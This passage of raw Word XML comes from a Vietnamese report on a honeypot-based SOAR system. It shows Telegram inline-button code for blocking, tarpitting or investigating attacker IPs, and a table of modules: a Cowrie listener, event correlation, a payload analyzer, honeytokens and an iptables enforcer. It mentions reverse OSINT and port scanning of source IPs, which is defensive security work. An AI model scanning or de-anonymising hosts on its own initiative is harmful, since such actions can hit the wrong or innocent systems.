    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021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Khác với các script thông báo một chiều, Telegram SOAR Bot được cài đặt luồng chạy nền (Background Polling Thread) để đón nhận các sự kiện bấm nút 'callback_query' từ phía Chuyên viên SOC và phản hồi kết quả tức thì:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table19"/>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1A">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reply_markup = {</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    "inline_keyboard": [</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        [</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">            {"text": "Trinh sát ngược OSINT", "callback_data": f"recon:{ip}"},</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">            {"text": "Đưa vào Tarpit", "callback_data": f"tarpit:{ip}"},</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        ],</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        [</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">            {"text": "Chặn Firewall tức thì", "callback_data": f"block:{ip}"},</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">            {"text": "Mở khóa IP", "callback_data": f"unblock:{ip}"},</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">        ],</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">    ]</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">}</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">payload = {"chat_id": self.chat_id, "text": text, "parse_mode": "HTML", "reply_markup": json.dumps(reply_markup)}</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021B">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Xây dựng giao diện nút bấm tương tác Inline Keyboard trong core/telegram_soar_bot.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021C">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4.9 Tích hợp Hệ thống qua Phân hệ Điều phối Trung tâm (main.py)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021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Tệp tin 'main.py' đóng vai trò là Orchestrator trung tâm, nạp tệp tin cấu hình YAML, liên kết toàn bộ 7 phân hệ với nhau và điều phối dữ liệu từ sự kiện log tới hành động SOAR.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021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Bảng 4.1 tổng kết trách nhiệm và sự liên kết giữa các module trong hệ sinh thái:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021F">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4.1: Danh sách các Module mã nguồn và Trách nhiệm xử lý trong Hệ sinh thái</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table20"/>
        <w:tblW w:w="94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4"/>
        <w:gridCol w:w="3134"/>
        <w:gridCol w:w="3134"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3134"/>
            <w:gridCol w:w="3134"/>
            <w:gridCol w:w="3134"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000220">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Module Tệp tin</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000221">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Trách nhiệm Kỹ thuật Cốt lõi</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000222">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Thư viện / Giao thức Chính Sử dụng</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000223">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">core/cowrie_listener.py</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000224">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Theo dõi và phân tích luồng JSON thời gian thực từ cowrie.json</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000225">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">json, os, time, threading</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26">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">core/correlation_engine.py</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000227">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Thuật toán cửa sổ trượt, tương quan sự kiện và ánh xạ MITRE ATT&amp;CK</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000228">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">dataclasses, collections, datetime</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000229">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">core/reverse_intel.py</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Trinh sát ngược OSINT, tra cứu GeoIP, AbuseIPDB, Shodan và quét cổng</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">socket, requests, ip-api, AbuseIPDB API</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2C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">core/honeytoken_manager.py</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022D">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Sinh file bẫy mồi (AWS, Bash, SQL) và xử lý khử ẩn danh Hacker</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022E">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">uuid, os, hashlib, HTTP Webhook</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000022F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">core/payload_analyzer.py</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000230">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Phân tích tĩnh mã độc, trích xuất IOCs IP/URL và tra cứu VirusTotal</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000231">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">hashlib, re, VirusTotal v3 API</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32">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">core/soar_enforcer.py</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000233">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Thực thi chặn iptables/nftables, điều hướng Tarpit và quản lý Whitelist</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000234">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">subprocess, platform, iptables, nat</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000235">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">core/telegram_soar_bot.py</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000236">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Gửi thẻ cảnh báo và xử lý tương tác nút bấm 2 chiều từ điện thoại</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000237">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Telegram Bot API, inline_keyboard, threading</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38">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">main.py</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000239">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
